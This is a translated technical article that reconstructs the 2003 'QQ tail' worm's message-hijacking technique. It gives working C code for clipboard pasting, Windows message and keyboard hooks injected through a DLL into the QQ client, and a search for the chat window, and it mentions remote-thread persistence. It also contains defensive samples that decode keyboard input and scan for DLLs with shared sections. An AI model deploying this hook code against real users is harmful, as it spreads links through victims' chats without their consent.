Research on the implementation of the QQ tail virus's core technique

Source: Internet
Author: User
In 2003 the QQ tail virus had its moment in the spotlight. It exploited an IE mail header vulnerability to spread wildly over QQ. Once a machine was infected, every message the user sent to someone else got an extra line automatically appended to the message text; the wording varied, but the point was always the same: get the recipient to click a URL and become the next victim.

What I discuss below is the technique the QQ tail virus used to do this. Since the virus's source code is not available, all of the code below is my own reconstruction; fortunately, its effect is essentially the same as that of the virus itself.
Pasting the tail

The easiest question to start with is how the text gets appended. There is no secret here: the program goes through the clipboard and "pastes" a line into the RichEdit control of QQ's message window. The code is as follows:
#include <windows.h>

TCHAR g_str[] = "Welcome to my small station to sit: http://titilima.nease.net";

// Function: paste the tail text into the message text box
void PasteText(HWND hRich)
{
    HGLOBAL hMem;
    LPTSTR  pStr;
    // Allocate movable global memory to hand to the clipboard
    hMem = GlobalAlloc(GHND | GMEM_SHARE, sizeof(g_str));
    if (hMem == NULL)
        return;
    pStr = (LPTSTR)GlobalLock(hMem);
    lstrcpy(pStr, g_str);
    GlobalUnlock(hMem);
    OpenClipboard(NULL);
    EmptyClipboard();
    // Set the clipboard text; from here on the clipboard owns hMem,
    // so it must not be freed with GlobalFree
    SetClipboardData(CF_TEXT, hMem);
    CloseClipboard();
    // Paste the text into the rich edit control
    SendMessage(hRich, WM_PASTE, 0, 0);
}

Hooks

OK, so the next question is: when should this text be pasted? Some online write-ups of the QQ tail implementation suggest using a timer to control when the paste happens, something like this:
// Timer handler of the simulator's dialog: paste on every tick
void CQQTailDlg::OnTimer(UINT nIDEvent)
{
    PasteText(hRich);
}
That is indeed one solution, but it has a serious limitation: how do you choose the timer interval? The victim may be in the middle of typing when the tail text "swishes" into the box...
The virus itself does not work that way: it pastes the text exactly when you click "Send" or press Ctrl+Enter. In January 2003 one of my Pentium II machines was infected, and because the machine was slow, the moment at which the text was pasted could be seen clearly.
From these facts the reader will surely have guessed it already: a hook! Yes, a hook; what I describe here is using a hook to faithfully reproduce the "QQ tail virus" technique.
First, a brief introduction to hooks; readers who already know them can skip this paragraph. A Win32 hook is not Captain Hook's iron hook, but a procedure that can be placed in the system to monitor, inspect and act on particular messages. Think of your program as the emperor and the Windows system as the provincial governors; a hook is then an imperial envoy. When the emperor decrees a national tax, he sends an envoy to the governor of Shanxi to say: "The emperor has decreed that Shanxi, in addition to the normal taxes, shall also deliver ten jars of wine." (-_-#...) Just as the emperor can single out one governor in this way, a programmer can use a hook to capture specific messages in the Windows system.
Applied to the "QQ tail virus", what we need is a hook that pastes our text after the user clicks the "Send" button. The hook procedure I implemented is as follows (how to install it I will explain later):
// Hook procedure: watches for the "Send" command message
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    CWPSTRUCT *p = (CWPSTRUCT *)lParam;
    // Catch the click on the Send button (its control ID is 1);
    // a negative nCode must be passed on untouched
    if (nCode >= 0 && p->message == WM_COMMAND && LOWORD(p->wParam) == 1)
        PasteText(g_hRich);
    return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}
A few remarks about this callback procedure:
1. lParam is a pointer to a CWPSTRUCT structure, which is declared as follows:
typedef struct {
    LPARAM lParam;
    WPARAM wParam;
    UINT   message;
    HWND   hwnd;
} CWPSTRUCT, *PCWPSTRUCT;
SDK fans like me will probably smile: aren't these the same four parameters a window procedure receives? Exactly so; you could even write the hook function as a switch (p->message) { /* ... */ } and take over the QQ window completely.
2. g_hRich is a global variable holding the handle of QQ's message text box. A global is used because this handle cannot be obtained from the parameters of the keyboard hook callback. How the handle is obtained, and the special placement of this global variable, I will explain later.
3. CallNextHookEx calls the next procedure in the hook chain. In terms of the analogy, the envoy then says: "The ten jars of wine have been accepted on the emperor's behalf; now please pay the normal taxes to the governor." (-_-#...) This is a very important part of writing a hook function: if you omit this call, the system's hook chain may break and some programs will stop responding. In fact, while writing this simulation program I took QQ down a few times.
4. You may ask why I catch the WM_COMMAND message. Let me explain with the following SDK-style code (QQ is written in MFC, but SDK code shows the relationship between WM_COMMAND and the "Send" button more clearly):
#define IDC_BTN_SENDMSG 1   // macro for the "Send" button ID

// Callback of the QQ "Send Message" dialog, mock-up by Li Ma
LRESULT CALLBACK ProcSendDlg(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
{
    switch (msg)
    {
    case WM_CLOSE:
        EndDialog(hDlg, 0);
        break;
    case WM_COMMAND:
        switch (LOWORD(wParam))
        {
        case IDC_BTN_SENDMSG:
            // send the message ...
            break;
        // handling of the other command buttons ...
        }
        break;
    // the other cases ...
    }
    return 0;
}
The whole process of sending a message is this: when the user clicks the Send button, the button's parent window (the "Send Message" dialog) receives a WM_COMMAND notification whose wParam low word (LOWORD(wParam)) is the button's ID, and the dialog then runs the code that actually sends the message, as shown in the following diagram:

This is why capturing WM_COMMAND is more effective than capturing other messages or installing a mouse hook.
Now this hook can do the job. But don't forget that many users prefer the Ctrl+Enter hot key to send messages, so the program also needs to install a keyboard hook:
// Keyboard hook procedure: watches for the "Send" hot key
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    // Catch Ctrl+Enter, and only on key-down (bit 31 of lParam clear)
    if (nCode >= 0 && wParam == VK_RETURN && GetAsyncKeyState(VK_CONTROL) < 0 && lParam >= 0)
        PasteText(g_hRich);
    return CallNextHookEx(g_hKey, nCode, wParam, lParam);
}
The only thing that needs explaining here is the lParam >= 0 clause. The if statement obviously tests for the Ctrl+Enter hot key, so what is lParam >= 0 for? In a keyboard hook callback, lParam is an important parameter that packs the repeat count, the scan code, the extended-key flag and so on. Its highest bit (0x80000000) is the transition state: it is 0 while the key is being pressed and 1 when it is being released. So lParam >= 0 means that PasteText is called only for WM_KEYDOWN; without this condition PasteText would be called twice (once more for WM_KEYUP).
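To make that bit test concrete, here is an added example that is not part of the article or its accompanying source. It decodes the documented lParam layout of a WH_KEYBOARD hook in portable C (no Windows headers, so it runs anywhere) and counts how often an Enter-watching hook would fire over one keystroke with and without the key-down filter. The sample lParam values are constructed, and the Ctrl check that the real hook performs with GetAsyncKeyState is assumed to have passed. The filter is written as an explicit test of bit 31, which is what lParam >= 0 means on the 32-bit signed LPARAM of a Win32 build.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Bit layout of the lParam a WH_KEYBOARD hook receives (identical to the
 * lParam of WM_KEYDOWN / WM_KEYUP), as documented for Win32:
 *   bits  0-15  repeat count
 *   bits 16-23  scan code
 *   bit  24     extended key (right Ctrl, keypad Enter, ...)
 *   bit  29     context code (Alt held)
 *   bit  30     previous key state (1 = key was already down)
 *   bit  31     transition state (0 = being pressed, 1 = being released)
 */
typedef struct {
    unsigned repeat_count;
    unsigned scan_code;
    int extended;
    int alt_down;
    int was_down;
    int released;
} kbd_lparam_t;

kbd_lparam_t decode_kbd_lparam(uint32_t lparam)
{
    kbd_lparam_t k;
    k.repeat_count = lparam & 0xFFFFu;
    k.scan_code    = (lparam >> 16) & 0xFFu;
    k.extended     = (int)((lparam >> 24) & 1u);
    k.alt_down     = (int)((lparam >> 29) & 1u);
    k.was_down     = (int)((lparam >> 30) & 1u);
    k.released     = (int)((lparam >> 31) & 1u);
    return k;
}

/* "bit 31 clear" is what `lParam >= 0` tests on a 32-bit signed LPARAM:
 * the key-down half of a keystroke. */
int is_keydown(uint32_t lparam)
{
    return (lparam & 0x80000000u) == 0;
}

/* Count how often a hook watching for Enter would fire over a stream of
 * Enter events, with or without the key-down filter. Ctrl is assumed held
 * throughout (the real hook checks it via GetAsyncKeyState, which this
 * portable sample cannot call). */
int count_enter_triggers(const uint32_t *lparams, size_t n, int filter_keydown)
{
    int fired = 0;
    for (size_t i = 0; i < n; i++) {
        if (!filter_keydown || is_keydown(lparams[i]))
            fired++;
    }
    return fired;
}

/* Constructed sample values for the Enter key (scan code 0x1C on a standard
 * PC keyboard): a fresh press, an auto-repeat press, and the release. */
#define SAMPLE_ENTER_DOWN    0x001C0001u  /* repeat 1, bits 30 and 31 clear */
#define SAMPLE_ENTER_REPEAT  0x401C0003u  /* repeat 3, was_down = 1 */
#define SAMPLE_ENTER_UP      0xC01C0001u  /* was_down = 1, released = 1 */

/* One keystroke as the hook sees it: a WM_KEYDOWN followed by a WM_KEYUP. */
static const uint32_t SAMPLE_ONE_KEYSTROKE[] = { SAMPLE_ENTER_DOWN, SAMPLE_ENTER_UP };
#define SAMPLE_ONE_KEYSTROKE_LEN (sizeof SAMPLE_ONE_KEYSTROKE / sizeof SAMPLE_ONE_KEYSTROKE[0])

int main(void)
{
    uint32_t samples[] = { SAMPLE_ENTER_DOWN, SAMPLE_ENTER_REPEAT, SAMPLE_ENTER_UP };
    for (size_t i = 0; i < 3; i++) {
        kbd_lparam_t k = decode_kbd_lparam(samples[i]);
        printf("lParam=0x%08X scan=0x%02X repeat=%u was_down=%d released=%d keydown=%d\n",
               (unsigned)samples[i], k.scan_code, k.repeat_count, k.was_down, k.released,
               is_keydown(samples[i]));
    }
    printf("triggers per keystroke: unfiltered=%d filtered=%d\n",
           count_enter_triggers(SAMPLE_ONE_KEYSTROKE, SAMPLE_ONE_KEYSTROKE_LEN, 0),
           count_enter_triggers(SAMPLE_ONE_KEYSTROKE, SAMPLE_ONE_KEYSTROKE_LEN, 1));
    return 0;
}
```

Over the two-event keystroke the unfiltered count is 2 and the filtered count is 1, which is the double call the paragraph warns about. The repeat sample also shows why the filter alone is not enough to distinguish a held key: auto-repeat events arrive as further key-downs with bit 30 set, so a hook that must react exactly once per press has to look at bit 30 as well.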

Installing the hooks and finding the window

The next step is how to install the two hooks. Two questions need answering: where to install them, and how?
The hooks must target the thread that owns QQ's "Send Message" window. My code installs the hooks once the handle of that window has been passed in:
// Install the hooks (hQQ != NULL) or remove them (hQQ == NULL).
// g_hInstDll is the DLL's own HINSTANCE, saved in DllMain.
BOOL WINAPI SetHook(HWND hQQ)
{
    BOOL bRet = FALSE;
    if (hQQ != NULL)
    {
        DWORD dwThreadId = GetWindowThreadProcessId(hQQ, NULL);
        // Thanks to Hottey's search code, which saved me a session with Spy++
        g_hRich = GetWindow(GetDlgItem(hQQ, 0), GW_CHILD);
        if (g_hRich == NULL)
            return FALSE;
        // Install the hooks on the thread that owns the window
        g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDll, dwThreadId);
        g_hKey  = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDll, dwThreadId);
        bRet = (g_hProc != NULL) && (g_hKey != NULL);
    }
    else
    {
        // Remove the hooks
        bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);
        g_hProc = NULL;
        g_hKey  = NULL;
        g_hRich = NULL;
    }
    return bRet;
}
All of the code so far lives in a dynamic link library, Hook.dll. I won't introduce DLLs here; please consult MSDN and this article's accompanying source code.
The DLL does all the important work (in fact this part can only be done by a DLL, which is dictated by the Windows virtual memory mechanism); the EXE only needs to call the exported SetHook function. So how do we obtain SetHook's parameter? See the following code:
// Thanks to Hottey's search code, which saved me a session with Spy++
HWND hSend;
g_hQQ = NULL;
SetHook(NULL);
do
{
    // Walk the top-level dialogs (class #32770) until one has a "Send" button
    g_hQQ = FindWindowEx(NULL, g_hQQ, "#32770", NULL);
    hSend = FindWindowEx(g_hQQ, NULL, "Button", "Send (&s)");
} while (g_hQQ != NULL && hSend == NULL);
if (g_hQQ != NULL)
    SetHook(g_hQQ);
The do-while loop in this code finds the "Send Message" window. QQ's windows are getting ever better hidden, one layer nested inside another, and finding them is very inconvenient, so my thanks go to Hottey's article "QQ message Bomb random", which saved me repeated sessions with Spy++. All I did was translate the Delphi code in his article into C.

The DLL's shared data segment

If you are not very familiar with DLLs, you will surely have questions about the following code when you read my accompanying source:
// Define the shared data segment
#pragma data_seg("shared")
HHOOK g_hProc = NULL;   // window procedure hook handle
HHOOK g_hKey  = NULL;   // keyboard hook handle
HWND  g_hRich = NULL;   // text box handle
#pragma data_seg()
#pragma comment(linker, "/SECTION:shared,RWS")
This defines a shared data segment. Yes, my comments say so clearly enough, but what does a shared data segment actually do? Before I answer, try commenting out the preprocessor directives beginning with # in this code, recompile the DLL and run it. What do you find?
Right: adding the tail fails!
Let me explain. The relationship between our simulator EXE, the DLL and QQ's main program is actually as follows:

The DLL needs one instance mapped into the EXE's address space so that the EXE can call it, and another instance mapped into QQ's address space to do the hook work. In other words, once the hook is installed there are two instances of this DLL among the system's modules, not one, and there is no connection between them. Take the global variable g_hRich: the DLL on the left of the diagram obtains the text box handle, but without the shared segment g_hRich is still NULL in the DLL on the right. The shared segment exists precisely to tie the EXE, the DLL and QQ together. It is somewhat like a static member variable in C++.
Once the hook is installed, you can look in a process manager with a module view and see that Hook.dll appears among the modules of QQ.exe as well.
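From the defender's side, the two observations above (a DLL that declares a writable shared section, and that DLL showing up in another process's module list) are exactly what is worth checking for. The following is an added example, not code from the article or its source package: a portable C scanner that walks a PE image's section table and reports every section marked both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_SHARED, which is what /SECTION:name,RWS produces. The image it scans here is a constructed minimal header with three sections; the scanner itself works on any real DLL read into memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Section characteristics from the PE/COFF specification. */
#define IMAGE_SCN_CNT_CODE             0x00000020u
#define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040u
#define IMAGE_SCN_MEM_SHARED           0x10000000u
#define IMAGE_SCN_MEM_EXECUTE          0x20000000u
#define IMAGE_SCN_MEM_READ             0x40000000u
#define IMAGE_SCN_MEM_WRITE            0x80000000u

typedef struct { char name[9]; uint32_t flags; } section_hit_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk the section table of a PE image held in memory and collect every
 * section that is both writable and shared, which is what
 * #pragma comment(linker, "/SECTION:name,RWS") produces.
 * Returns the number of such sections, or -1 if the buffer is not a PE image. */
int find_shared_writable_sections(const uint8_t *img, size_t len, section_hit_t *hits, int max_hits)
{
    if (img == NULL || len < 0x40 || img[0] != 'M' || img[1] != 'Z')
        return -1;
    size_t pe_off = rd32(img + 0x3C);                 /* e_lfanew */
    if (pe_off + 24 > len || memcmp(img + pe_off, "PE\0\0", 4) != 0)
        return -1;
    const uint8_t *coff = img + pe_off + 4;           /* IMAGE_FILE_HEADER, 20 bytes */
    uint16_t nsec = rd16(coff + 2), opt_size = rd16(coff + 16);
    size_t sec_off = pe_off + 4 + 20 + opt_size;
    if (sec_off + (size_t)nsec * 40 > len)
        return -1;
    int n = 0;
    for (uint16_t i = 0; i < nsec; i++) {
        const uint8_t *s = img + sec_off + (size_t)i * 40;   /* IMAGE_SECTION_HEADER */
        uint32_t flags = rd32(s + 36);                        /* Characteristics */
        if ((flags & IMAGE_SCN_MEM_SHARED) && (flags & IMAGE_SCN_MEM_WRITE)) {
            if (hits != NULL && n < max_hits) {
                memcpy(hits[n].name, s, 8);
                hits[n].name[8] = '\0';
                hits[n].flags = flags;
            }
            n++;
        }
    }
    return n;
}

/* Constructed sample: a minimal PE header with three sections shaped like the
 * Hook.dll in the text. SizeOfOptionalHeader is left at 0 to keep the sample
 * small; a real image carries a full optional header at that position. */
size_t build_sample_pe(uint8_t *buf, size_t cap)
{
    static const struct { const char *name; uint32_t flags; } secs[] = {
        { ".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ },
        { ".data",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE },
        { "shared", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_SHARED },
    };
    const size_t pe_off = 0x40, need = pe_off + 4 + 20 + 3 * 40;
    if (cap < need)
        return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3C] = (uint8_t)pe_off;                      /* e_lfanew, little-endian */
    memcpy(buf + pe_off, "PE\0\0", 4);
    uint8_t *coff = buf + pe_off + 4;
    coff[0] = 0x4C; coff[1] = 0x01;                   /* IMAGE_FILE_MACHINE_I386 */
    coff[2] = 3;                                      /* NumberOfSections */
    uint8_t *sec = coff + 20;
    for (int i = 0; i < 3; i++, sec += 40) {
        memcpy(sec, secs[i].name, strlen(secs[i].name));
        uint32_t f = secs[i].flags;                   /* Characteristics at offset 36 */
        sec[36] = (uint8_t)f; sec[37] = (uint8_t)(f >> 8);
        sec[38] = (uint8_t)(f >> 16); sec[39] = (uint8_t)(f >> 24);
    }
    return need;
}

char g_first_hit[9];   /* name of the first flagged section in the sample */

/* Build the constructed sample and scan it; returns the number of hits. */
int scan_sample(void)
{
    uint8_t buf[256];
    section_hit_t hits[16];
    size_t len = build_sample_pe(buf, sizeof buf);
    int n = find_shared_writable_sections(buf, len, hits, 16);
    strcpy(g_first_hit, n > 0 ? hits[0].name : "");
    return n;
}

int main(void)
{
    int n = scan_sample();
    printf("shared+writable sections: %d, first: %s\n", n, g_first_hit);
    return 0;
}
```

On the sample the scanner reports exactly one hit, the "shared" section, and ignores the ordinary .text and .data sections. A writable shared section is a legitimate but rarely needed feature: its contents are visible to, and modifiable by, every process that maps the DLL. Running a check like this over the modules loaded into a process is one way to notice a Hook.dll-style injection, given the observation above that the DLL appears among QQ.exe's modules once the hook is installed.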

Closing remarks

1. As I said earlier, I encountered the virus in January 2003, and I still clearly remember that the virus EXE was only 16KB. Given the nature of a virus, this thing would be more practical written in Win32 assembly.
2. The virus I encountered was killed by hand with a process viewing tool. But the current "QQ tail" adds a resurrection function: after the EXE is killed, the DLL wakes it up again. I analysed this with my process viewing tool and found that almost every process in the system had been planted with the virus DLL. The technique is to use CreateRemoteThread to insert an extra resurrection thread into every process, which is really harsh: it ensures the EXE runs forever, and the DLL, being in use, cannot be deleted. I have implemented this technique as well, but its stability is far from that of the virus itself, so I won't write it up; interested readers can refer to the relevant chapters of Jeffrey Richter's "Windows Core Programming".
3. This reminds me of a line by Hou Jie in "STL Source Code Analysis": "Before the source code, there are no secrets." If you feel that way after reading this, I would be honoured.
